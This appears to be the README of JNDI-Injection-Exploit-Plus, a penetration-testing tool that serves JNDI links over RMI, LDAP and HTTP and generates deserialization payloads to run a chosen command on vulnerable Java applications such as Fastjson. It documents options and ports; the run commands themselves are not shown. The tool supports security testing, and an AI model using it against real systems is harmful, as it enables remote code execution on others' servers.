JNDI-Injection-Exploit-Plus: generating workable JNDI links and providing background services

JNDI-Injection-Exploit-Plus

JNDI-Injection-Exploit-Plus is a tool for generating workable JNDI links and providing background services by starting the RMI, LDAP, and HTTP servers.

Using this tool allows you to get JNDI links, you can insert these links into your POC to test a vulnerability.

For example, this is a Fastjson vul-poc:

We can replace “rmi://127.0.0.1:1099/Object” with the link generated by JNDI-Injection-Exploit-Plus to test vulnerability.

What’s more, you can also use JNDI-Injection-Exploit-Plus to generate base64/hex type of payloads like ysoserial

Usage

JNDI Links

Run as

where:

• -C – command executed in the remote classfile.

  (optional , default command is “open /Applications/Calculator.app”)

• -A – the address of your server, maybe an IP address or a domain.

  (optional , default address is the first network interface address)

Points for attention:

• make sure your server’s ports (1099, 1389, 8180) are available .

  or you can change the default port in the run.ServerStart class.

• your command is passed to Runtime.getRuntime().exec() as parameters,

  so you need to ensure your command is workable in method exec().

  Command in bash like “bash -c ….” need to add Double quotes.

Deserialization Payloads

Run as

where:

• -C – command executed in the remote classfile.

  (optional , default command is “open /Applications/Calculator.app”)

• -D – The deserial Gadget payload name.

• -O – (Optional) The deserial output type, default is base64

Deserialization Exploits

JRMP

• JRMPListener

• JRMPClient

Install

Copyright (c) 2022 cckuailong